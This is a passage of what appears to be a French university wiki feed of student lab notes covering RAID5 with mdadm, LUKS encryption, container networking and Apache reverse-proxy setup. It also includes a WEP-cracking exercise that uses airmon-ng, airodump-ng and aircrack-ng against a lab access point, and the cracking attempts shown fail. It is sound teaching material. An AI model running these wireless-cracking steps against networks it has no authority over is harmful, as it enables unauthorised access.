Nous créons le volume /dev/md0 pour créer un RAID5 logiciel avec les trois partitions obtenues. On sauvegarde ensuite la configuration actelle.&lt;br /&gt;
    root@IMA5-BANANE:~# mdadm --detail --scan &amp;gt;&amp;gt; /etc/mdadm/mdadm.conf&lt;br /&gt;
    root@IMA5-BANANE:~# mkfs /dev/md0&lt;br /&gt;
    root@IMA5-BANANE:~# mkdir /datamd0&lt;br /&gt;
    root@IMA5-BANANE:/datamd0# mount /dev/md0 /datamd0/&lt;br /&gt;
&lt;br /&gt;
Ensuite il faut éditer le fichier /etc/fstab en rajoutant la ligne suivante à la fin du fichier afin d'être sûr que la partition soit encore montée après le reboot:&lt;br /&gt;
&lt;br /&gt;
    /dev/md0 /datamd0&lt;br /&gt;
&lt;br /&gt;
Nous créons un fichier texte sur le raid5:&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:/datamd0# vim raid5test.txt&lt;br /&gt;
&lt;br /&gt;
Pour avoir le détail de la configuration actuelle:&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:~# mdadm --detail /dev/md0&lt;br /&gt;
  /dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Wed Oct 25 18:27:13 2017&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 3&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
    Update Time : Wed Oct 25 17:03:20 2017&lt;br /&gt;
          State : clean &lt;br /&gt;
 Active Devices : 3&lt;br /&gt;
 Working Devices : 3&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
           Name : IMA5-BANANE:0  (local to host IMA5-BANANE)&lt;br /&gt;
           UUID : b70ad336:fb198d84:a5909f1c:f4b33229&lt;br /&gt;
         Events : 2&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0     202       48        0      active sync   /dev/xvdd&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous arrêtons la MV, mettons en commentaire la 1ère partition dans le fichier de configuration, puis redémarrons la machine. On constaste que la premiere partition a été &amp;quot;removed&amp;quot;:&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:~# mdadm --detail /dev/md0&lt;br /&gt;
  /dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Wed Oct 25 18:27:13 2017&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 2&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
    Update Time : Wed Oct 25 18:51:56 2017&lt;br /&gt;
          State : clean, degraded &lt;br /&gt;
 Active Devices : 2&lt;br /&gt;
 Working Devices : 2&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
           Name : IMA5-BANANE:0  (local to host IMA5-BANANE)&lt;br /&gt;
           UUID : b70ad336:fb198d84:a5909f1c:f4b33229&lt;br /&gt;
         Events : 12&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0       0        0        0      removed&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On voit bien qu'une partition a été supprimée mais que le fichier créé auparavant est toujours présent:&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:~# ls /datamd0/&lt;br /&gt;
    raid5test.txt&lt;br /&gt;
&lt;br /&gt;
Pour remettre la partition dans le raid5 il faut taper la commande suivante&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:~# mdadm --add /dev/md0 /dev/xvdd&lt;br /&gt;
&lt;br /&gt;
Pour le test de réparation, afin de bien voir l'avancement de la reconstruction, nous avons procédé comme dans l'exemple du cours: Suppression de la partition xvdd:&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:~# mdadm --set-faulty /dev/md0 /dev/xvdd&lt;br /&gt;
    root@IMA5-BANANE:~# mdadm --remove /dev/md0 /dev/xvdd&lt;br /&gt;
 La partition est bien supprimée:&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
&lt;br /&gt;
On remet à présent la partition supprimée:&lt;br /&gt;
    root@IMA5-BANANE:~# mdadm --add /dev/md0 /dev/xvdd&lt;br /&gt;
&lt;br /&gt;
On essaie ensuite de remonter le RAID5 et on peut constater l'avancement de la reconstruction en lançant la même commande assez régulièrement:&lt;br /&gt;
&lt;br /&gt;
    root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [===========&amp;gt;.........]  recovery = 59.7% (627140/1047552) finish=0.2min speed=28506K/sec&lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [============&amp;gt;........]  recovery = 64.5% (676392/1047552) finish=0.2min speed=29408K/sec     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 66.2% (695080/1047552) finish=0.2min speed=28961K/sec     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 68.1% (714664/1047552) finish=0.1min speed=28586K/sec&lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [==================&amp;gt;..]  recovery = 94.6% (991996/1047552) finish=0.0min speed=29206K/sec   &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Cryptage des données&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
Nous n'avons qu'une carte SD pour tous les binômes. On crée donc un disque logiciel localement sur /dev/mmcblk1 nous-mêmes pour &lt;br /&gt;
effectuer son cryptage en AES avec un hachage SHA256 et on renseigne un mot de passe de cryptage.&lt;br /&gt;
&lt;br /&gt;
    cryptsetup luksFormat -c aes -h sha256 /dev/mmcblk1&lt;br /&gt;
&lt;br /&gt;
Nous ouvrons la partition Luks, puis nous formatons le disque :&lt;br /&gt;
&lt;br /&gt;
    cryptsetup luksOpen /dev/sdb1 banane-crypt&lt;br /&gt;
    mkfs.ext4 /dev/mapper/banane-crypt&lt;br /&gt;
&lt;br /&gt;
On monte le disque et on crée un fichier avec du texte dessus.&lt;br /&gt;
&lt;br /&gt;
    mount /dev/mapper/banane-crypt /mnt&lt;br /&gt;
    vi /mnt/test.txt&lt;br /&gt;
&lt;br /&gt;
On démonte ensuite le disque et on ferme la partition Luks.&lt;br /&gt;
&lt;br /&gt;
    umount /mnt&lt;br /&gt;
    cryptsetup luksClose banane-crypt&lt;br /&gt;
&lt;br /&gt;
Pour vérifier le cryptage de notre disque, on tente d'accéder de nouveau au disque et on s'aperçoit qu'on nous demande le mot de passe.&lt;br /&gt;
&lt;br /&gt;
    cryptsetup luksOpen /dev/sdb1 banane-crypt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Crackage de clef WEP sur Point d'accès Wi-Fi&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
root@zabeth17:/home/pifou# nping --arp-type ARP -c 11000  --flags rst --ttl 2 10.2.0.2&lt;br /&gt;
&lt;br /&gt;
Starting Nping 0.7.60 ( https://nmap.org/nping ) at 2017-12-12 15:13 GMT&lt;br /&gt;
SENT (0.0373s) ARP who has 10.2.0.2? Tell 172.26.145.112&lt;br /&gt;
RCVD (0.2238s) ARP reply 10.2.0.2 is at 00:00:0C:9F:F0:32&lt;br /&gt;
SENT (1.0378s) ARP who has 10.2.0.2? Tell 172.26.145.112&lt;br /&gt;
RCVD (1.2438s) ARP reply 10.2.0.2 is at 00:00:0C:9F:F0:32&lt;br /&gt;
SENT (2.0387s) ARP who has 10.2.0.2? Tell 172.26.145.112&lt;br /&gt;
RCVD (2.0638s) ARP reply 10.2.0.2 is at 00:00:0C:9F:F0:32&lt;br /&gt;
SENT (3.0399s) ARP who has 10.2.0.2? Tell 172.26.145.112&lt;br /&gt;
RCVD (3.0839s) ARP reply 10.2.0.2 is at 00:00:0C:9F:F0:32&lt;br /&gt;
SENT (4.0419s) ARP who has 10.2.0.2? Tell 172.26.145.112&lt;br /&gt;
RCVD (4.1078s) ARP reply 10.2.0.2 is at 00:00:0C:9F:F0:32&lt;br /&gt;
SENT (5.0439s) ARP who has 10.2.0.2? Tell 172.26.145.112&lt;br /&gt;
&lt;br /&gt;
root@zabeth17:/home/pifou# cat /etc/network/interfaces&lt;br /&gt;
# This file describes the network interfaces available on your system&lt;br /&gt;
# and how to activate them. For more information, see interfaces(5).&lt;br /&gt;
&lt;br /&gt;
source /etc/network/interfaces.d/*&lt;br /&gt;
&lt;br /&gt;
# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
auto wlx000fb5922374&lt;br /&gt;
iface wlx000fb5922374 inet static&lt;br /&gt;
 wireless-keymode open&lt;br /&gt;
 wireless-mode managed&lt;br /&gt;
 address 10.2.0.100&lt;br /&gt;
 netmask 255.255.0.0&lt;br /&gt;
 wireless-essid banane&lt;br /&gt;
 wireless-key 01234567891011121314151617&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
airmon-ng start wlx000fb5922374&lt;br /&gt;
root@zabeth17:/home/pifou# iwconfig&lt;br /&gt;
docker0   no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
vmnet1    no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
vmnet8    no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
vethea48f02  no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
vethc680cf4  no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
enp6s0    no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
veth27a815a  no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
veth3773236  no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
vethf9b8093  no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
enp0s25   no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wlan0mon  IEEE 802.11  Mode:Monitor  Frequency:2.447 GHz  Tx-Power=15 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Power Management:off&lt;br /&gt;
          &lt;br /&gt;
bridge    no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
vethb5bee00  no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
veth12b76b4  no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
root@zabeth17:/home/pifou# airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
 CH  8 ][ Elapsed: 6 s ][ 2017-12-12 15:04                                         &lt;br /&gt;
                                                                                                        &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                        &lt;br /&gt;
 C4:14:3C:12:61:C2  -67       26        0    0   9  54e. WEP  WEP         BORNE_TEST3                   &lt;br /&gt;
 C4:14:3C:12:61:C1  -61       28        0    0   9  54e. WEP  WEP         BORNE_TEST2                   &lt;br /&gt;
 C4:14:3C:40:78:60  -70       21        0    0   3  54e. WEP  WEP         ananas                        &lt;br /&gt;
 C4:14:3C:40:78:63  -76       20        0    0   3  54e. WEP  WEP         goyave                         &lt;br /&gt;
 C4:14:3C:12:61:C4  -68       25        0    0   9  54e. WEP  WEP         BORNE_TEST5                   &lt;br /&gt;
 C4:14:3C:12:61:C0  -68       27        0    0   9  54e. WEP  WEP         BORNE_TEST1                   &lt;br /&gt;
 C4:14:3C:12:61:C3  -63       25        0    0   9  54e. WEP  WEP         BORNE_TEST4                   &lt;br /&gt;
 C4:14:3C:40:78:61  -73       16        0    0   3  54e. WEP  WEP         banane                        &lt;br /&gt;
 C4:14:3C:40:78:64  -68       14        0    0   3  54e. WEP  WEP         groseille                     &lt;br /&gt;
 C4:14:3C:40:78:65  -74       22        0    0   3  54e. WEP  WEP         reseau1                       &lt;br /&gt;
 C4:14:3C:12:61:C5  -59       24        0    0   9  54e. WEP  WEP         BORNE_TEST6                    &lt;br /&gt;
 C4:14:3C:40:78:62  -72       16        0    0   3  54e. WEP  WEP         durian                        &lt;br /&gt;
 C4:14:3C:40:78:67  -77       16        0    0   3  54e. WEP  WEP         tomate                        &lt;br /&gt;
                                                                                                        &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                               &lt;br /&gt;
                                                                                                        &lt;br /&gt;
 (not associated)   AC:AF:B9:B0:DF:32  -75    0 - 1      0        1  PolytechLille                       &lt;br /&gt;
 (not associated)   B8:08:D7:16:6E:69  -73    0 - 1      0        1                                      &lt;br /&gt;
 (not associated)   60:F4:45:D0:DA:DB  -73    0 - 1      0        2  PolytechLille  &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
pifou@zabeth15:~$ su&lt;br /&gt;
Password: &lt;br /&gt;
root@zabeth15:/home/pifou# iwconfig&lt;br /&gt;
vethbecbb63  no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
enp0s25   no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
enp6s0    no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
docker0   no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
vmnet1    no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
bridge    no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
vmnet8    no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wlx000fb5922266  IEEE 802.11  ESSID:off/any  &lt;br /&gt;
          Mode:Managed  Access Point: Not-Associated   Tx-Power=0 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Encryption key:off&lt;br /&gt;
          Power Management:off&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
root@zabeth15:/home/pifou# airmon-ng start wlx000fb5922266&lt;br /&gt;
&lt;br /&gt;
Found 3 processes that could cause trouble.&lt;br /&gt;
If airodump-ng, aireplay-ng or airtun-ng stops working after&lt;br /&gt;
a short period of time, you may want to run 'airmon-ng check kill'&lt;br /&gt;
&lt;br /&gt;
  PID Name&lt;br /&gt;
 1695 dhclient&lt;br /&gt;
 2949 avahi-daemon&lt;br /&gt;
 2950 avahi-daemon&lt;br /&gt;
&lt;br /&gt;
PHY	Interface	Driver		Chipset&lt;br /&gt;
&lt;br /&gt;
phy0	wlx000fb5922266	p54usb		NetGear, Inc. WG111(v1) rev 2 54 Mbps Wireless [Intersil ISL3887]&lt;br /&gt;
Interface 15mon is too long for linux so it will be renamed to the old style (wlan#) name.&lt;br /&gt;
&lt;br /&gt;
		(mac80211 monitor mode vif enabled on [phy0]wlan0mon&lt;br /&gt;
		(mac80211 station mode vif disabled for [phy0]wlx000fb5922266)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
root@zabeth15:/home/pifou# airodump-ng --bssid C4:14:3C:40:78:61 -c 3 -w crack_wep_ungdelatte wlan0mon&lt;br /&gt;
&lt;br /&gt;
# -c 3 précise que le réseau est sur le channel 3.&lt;br /&gt;
# -w crack_wep_ungdelatte est le fichier qui va stocker les paquets capturés.&lt;br /&gt;
&lt;br /&gt;
 CH  3 ][ Elapsed: 20 mins ][ 2017-12-12 15:18                     &lt;br /&gt;
                                                                   &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  C&lt;br /&gt;
                                                                   &lt;br /&gt;
 C4:14:3C:40:78:61  -64   8    11488        0    0   3  54e. WEP  W&lt;br /&gt;
                                                                   &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
root@zabeth15:/home/pifou# aircrack-ng crack_wep_ungdelatte-01.cap&lt;br /&gt;
Opening crack_wep_ungdelatte-01.cap&lt;br /&gt;
Read 12494 packets.&lt;br /&gt;
&lt;br /&gt;
   #  BSSID              ESSID                     Encryption&lt;br /&gt;
&lt;br /&gt;
   1  C4:14:3C:40:78:61  banane                    No data - WEP or WPA&lt;br /&gt;
&lt;br /&gt;
Choosing first network as target.&lt;br /&gt;
&lt;br /&gt;
Opening crack_wep_ungdelatte-01.cap&lt;br /&gt;
Got no data packets from target network!&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
root@zabeth15:/home/pifou# airodump-ng --bssid C4:14:3C:40:78:61 -c 3 -w crack_wep_ungdelatte wlan0mon&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 CH  3 ][ Elapsed: 28 mins ][ 2017-12-12 16:03                     &lt;br /&gt;
                                                                   &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  C&lt;br /&gt;
                                                                   &lt;br /&gt;
 C4:14:3C:40:78:61  -64   0    16423        0    0   3  54e. WEP  W&lt;br /&gt;
                                                                   &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames&lt;br /&gt;
                                                                   &lt;br /&gt;
&lt;br /&gt;
root@zabeth15:/home/pifou# ls&lt;br /&gt;
3D				       Documents&lt;br /&gt;
Arduino				       Downloads&lt;br /&gt;
crack_wep_ungdelatte-01.cap	       GIS4_Bernard_Castelein&lt;br /&gt;
crack_wep_ungdelatte-01.csv	       IMA5sc-ASR&lt;br /&gt;
crack_wep_ungdelatte-01.kismet.csv     Music&lt;br /&gt;
crack_wep_ungdelatte-01.kismet.netxml  Pictures&lt;br /&gt;
crack_wep_ungdelatte-02.cap	       Public&lt;br /&gt;
crack_wep_ungdelatte-02.csv	       R&lt;br /&gt;
crack_wep_ungdelatte-02.kismet.csv     replay_arp-1212-153701.cap&lt;br /&gt;
crack_wep_ungdelatte-02.kismet.netxml  Templates&lt;br /&gt;
Desktop				       Videos&lt;br /&gt;
root@zabeth15:/home/pifou# aircrack-ng crack_wep_ungdelatte-02.cap&lt;br /&gt;
Opening crack_wep_ungdelatte-02.cap&lt;br /&gt;
Read 13001 packets.&lt;br /&gt;
&lt;br /&gt;
   #  BSSID              ESSID                     Encryption&lt;br /&gt;
&lt;br /&gt;
   1  C4:14:3C:40:78:61  banane                    No data - WEP or WPA&lt;br /&gt;
&lt;br /&gt;
Choosing first network as target.&lt;br /&gt;
&lt;br /&gt;
Opening crack_wep_ungdelatte-02.cap&lt;br /&gt;
Got no data packets from target network!&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Quitting aircrack-ng...&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Mise en réseau et création de conteneurs sous Machine Virtuelle Linux&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On se propose dans cette partie de réaliser la création et la mise en réseau de conteneurs sous Linux.&lt;br /&gt;
&lt;br /&gt;
Après avoir créé un système de fichiers avec debootstrap puis une machine virtuelle (IMA5-BANANE en l'occurence) sur le serveur de virtualisation Cordouan, on crée trois conteneurs C1, C2 et C3 distincts au sein celle-ci.&lt;br /&gt;
&lt;br /&gt;
Connecter les conteneurs en réseau :&lt;br /&gt;
&lt;br /&gt;
    créer une double interface Ethernet virtuelle ;&lt;br /&gt;
    sur l’hôte ajouter l’interface dans un pont virtuel ;&lt;br /&gt;
    envoyer le pair dans l’espace réseau du conteneur ;&lt;br /&gt;
    configurer l’adresse IP sur l’interface du conteneur ...&lt;br /&gt;
    ... il peut être nécessaire d’utiliser nsenter. &lt;br /&gt;
&lt;br /&gt;
Pour la création d'un conteneur, on utilise la commande unshare couplée à des options et à une fonction serverx.sh qui ne fait que repeter une fonction sleep 5 en boucle. Elle permet de lancer séparément une commande (ici /bin/serverx.sh) en définissant un root différent.&lt;br /&gt;
&lt;br /&gt;
    unshare -n -u -m -p -f chroot ./chroot /bin/serverx.sh&lt;br /&gt;
&lt;br /&gt;
Si on veut entrer dans le conteneur après en être sorti, on utilise la commande:&lt;br /&gt;
&lt;br /&gt;
    nsenter -n -u -m -p -t &amp;lt;PID&amp;gt; chroot ./chroot /bin/bash&lt;br /&gt;
&lt;br /&gt;
On ajoute alors toutes nos interfaces virtuelles eth0@vifX de type veth. Les Ponts &amp;quot;monpont&amp;quot; et &amp;quot;carrefour&amp;quot; ont déjà été définis dans /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
    ip link add vif1 type veth peer name eth0@vif1&lt;br /&gt;
    ip link add vif2 type veth peer name eth0@vif2&lt;br /&gt;
    ip link add vif3 type veth peer name eth0@vif3&lt;br /&gt;
    ip link add vif4 type veth peer name eth0@vif4&lt;br /&gt;
&lt;br /&gt;
On ajoute les vifx aux ponts correspondants&lt;br /&gt;
&lt;br /&gt;
    ip link set vif1 master monpont&lt;br /&gt;
    ip link set vif2 master carrefour &lt;br /&gt;
    ip link set vif3 master carrefour&lt;br /&gt;
    ip link set vif4 master carrefour&lt;br /&gt;
 &lt;br /&gt;
On peut vérifier la création à chaque commande grâce aux la commande:&lt;br /&gt;
&lt;br /&gt;
    ip l show et brctl show&lt;br /&gt;
&lt;br /&gt;
L'adresse ip de &amp;quot;monpont&amp;quot; est défini dans le fichier interfaces avec l'adresse 193.48.57.179 et est connecté au réseau via eth0&lt;br /&gt;
Nous avons choisis le reseau local entre les conteneur sur la plage 192.168.0.0/24. L'adresse de &amp;quot;carrefour&amp;quot; est 192.168.0.1.&lt;br /&gt;
&lt;br /&gt;
On peut alors définir eth0@vif1 (renommée eth0) comme étant l'interface entre le reverse proxy et &amp;quot;monpont&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
    ip link set eth0@vif1 netns /proc/&amp;lt;PID&amp;gt;/ns/net name eth0&lt;br /&gt;
&lt;br /&gt;
On peut alors définir eth0@vif2 (renommée eth1) comme étant l'interface entre le reverse proxy et les carrefour.&lt;br /&gt;
&lt;br /&gt;
    ip link set eth0@vif2 netns /proc/&amp;lt;PID&amp;gt;/ns/net name eth1&lt;br /&gt;
&lt;br /&gt;
On peut alors définir eth0@vif3 et eth0@vif4 (renommées eth0) comme étant les interfaces respectives entre le server1, serveur 2 et le pont carrefour.&lt;br /&gt;
&lt;br /&gt;
    ip link set eth0@vif3 netns /proc/&amp;lt;PID&amp;gt;/ns/net name eth0&lt;br /&gt;
    ip link set eth0@vif4 netns /proc/&amp;lt;PID&amp;gt;/ns/net name eth0&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur &amp;quot;chroot&amp;quot;, on ajoute alors l'adresse IP 193.48.57.189/28 à eth0 et on active eth0, vif1 et &amp;quot;monpont&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
    ip addr add 193.48.57.189/28 dev eth0&lt;br /&gt;
    ip link set dev eth0 up&lt;br /&gt;
    ip link set vif1 up&lt;br /&gt;
    ip link set dev monpont up&lt;br /&gt;
&lt;br /&gt;
Dans le conteneurs serverX et dans le reverse proxy, on ajoute alors les adresse IP 192.168.0.100/24 et 192.168.0.200/24 et 192.168.0.150/24 aux eth0 respectifs puis on active vif2 vif3 vif4 et &amp;quot;carrefour&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
Le réseau étant fonctionnel nous pouvons nous attaquer à la configuration des serveur apache2.&lt;br /&gt;
&lt;br /&gt;
Nous avons donc installé un serveur apache2 dans chaque conteneur.&lt;br /&gt;
&lt;br /&gt;
Pour ce qui est du serveur apache qui jouera le rôle de reverse proxy le fichier de configuration se trouvant dans /etc/apache2/sites-available sera configuré de la manière suivante:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 ServerName 193.48.57.189:80&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.189:80&amp;gt;&lt;br /&gt;
 ServerName reverse.banane.space&lt;br /&gt;
 DocumentRoot /var/www/html&lt;br /&gt;
 ProxyPass / http://192.168.0.100:631&lt;br /&gt;
 ProxyPassReverse / http://192.168.0.100:631&lt;br /&gt;
 ProxyRequests Off&lt;br /&gt;
 LogFormat &amp;quot;%h %l %u %t \&amp;quot;%r\&amp;quot; %&amp;gt;s %b&amp;quot; common&lt;br /&gt;
 CustomLog logs/access_log common&lt;br /&gt;
 &amp;lt;VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On retrouve l'adresse du serveur apache qui correspond à celle du conteneur relié au réseau 192.48.57.189.&lt;br /&gt;
&lt;br /&gt;
On redirigera les requêtes via le port 631 (TCP/UDP) toutefois il est tout à fais possible de le faire circuler sur le port 80 car les serveurs se trouvent normalement dans des conteneurs.&lt;br /&gt;
&lt;br /&gt;
Au niveau de '''server1'''(équivalent pour server2) j'ai seulement cré un serveur apache2 sous cette forme:&lt;br /&gt;
&lt;br /&gt;
 ServerName 192.168.0.100:631&lt;br /&gt;
 &amp;lt;VirtualHost 192.168.0.100:631&amp;gt;&lt;br /&gt;
 ServerName site1.banane.space&lt;br /&gt;
 DocumentRoot /var/www/html&lt;br /&gt;
 LogFormat &amp;quot;%h %l %u %t \&amp;quot;%r\&amp;quot; %&amp;gt;s %b&amp;quot; common&lt;br /&gt;
 CustomLog logs/access_log common&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
il peut être nécessaire de demander dans ports.conf d'écouter le port 631.&lt;br /&gt;
&lt;br /&gt;
Dans le dns db.banane.space nous avons rajouter les différentes adresses:&lt;br /&gt;
&lt;br /&gt;
 reverse	IN	A	193.48.57.189&lt;br /&gt;
 site1	        IN	A	193.48.57.189&lt;br /&gt;
 site2	        IN	A	193.48.57.189&lt;/div&gt;</summary>
		<author><name>Hdelatte</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2017_groupe_n%C2%B05&amp;diff=46619</id>
		<title>Cahier 2017 groupe n°5</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2017_groupe_n%C2%B05&amp;diff=46619"/>
				<updated>2017-12-13T14:15:27Z</updated>
		
		<summary type="html">&lt;p&gt;Hdelatte : /* Mise en réseau et création de conteneurs sous Machine Virtuelle Linux */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Présentation générale'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
&lt;br /&gt;
